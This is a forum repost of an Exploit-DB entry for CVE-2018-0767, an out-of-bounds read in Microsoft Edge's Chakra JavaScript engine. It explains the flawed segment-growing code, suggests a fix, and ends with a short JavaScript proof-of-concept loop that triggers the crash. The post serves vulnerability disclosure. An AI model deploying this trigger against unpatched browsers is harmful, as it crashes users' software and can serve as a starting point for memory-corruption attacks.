Exploit Microsoft Edge Chakra - 'AppendLeftOverItemsFromEndSegment' Out-of-Bounds Read

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
43522
Проверка EDB
  1. Пройдено
Автор
GOOGLE SECURITY RESEARCH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2018-0767
Дата публикации
2018-01-11
Microsoft Edge Chakra - 'AppendLeftOverItemsFromEndSegment' Out-of-Bounds Read
Код:
/*
Here's a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl.

growby = endSeg->length;
current = current->GrowByMin(recycler, growby);
CopyArray(current->elements + endIndex + 1, endSeg->length,
    ((Js::SparseArraySegment<T>*)endSeg)->elements, endSeg->length);
LinkSegments((Js::SparseArraySegment<T>*)startPrev, current);
if (HasNoMissingValues())
{
    if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
    {
        SetHasNoMissingValues(false);
    }
}

In the "ScanForMissingValues" method, it uses "head". But it doesn't check the grown segment "current" is equal to "head" before calling the method.
I guess it shoud be like:
if (current == head && HasNoMissingValues())
{
    if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
    {
        SetHasNoMissingValues(false);
    }
}
*/

function trigger() {
    let arr = [1.1];
    let i = 0;
    for (; i < 1000; i += 0.5) {
        arr[i + 0x7777] = 2.0;
    }

    arr[1001] = 35480.0;

    for (; i < 0x7777; i++) {
        arr[i] = 1234.3;
    }
}

for (let i = 0; i < 100; i++) {
    trigger();
}
 
Источник
www.exploit-db.com

Похожие темы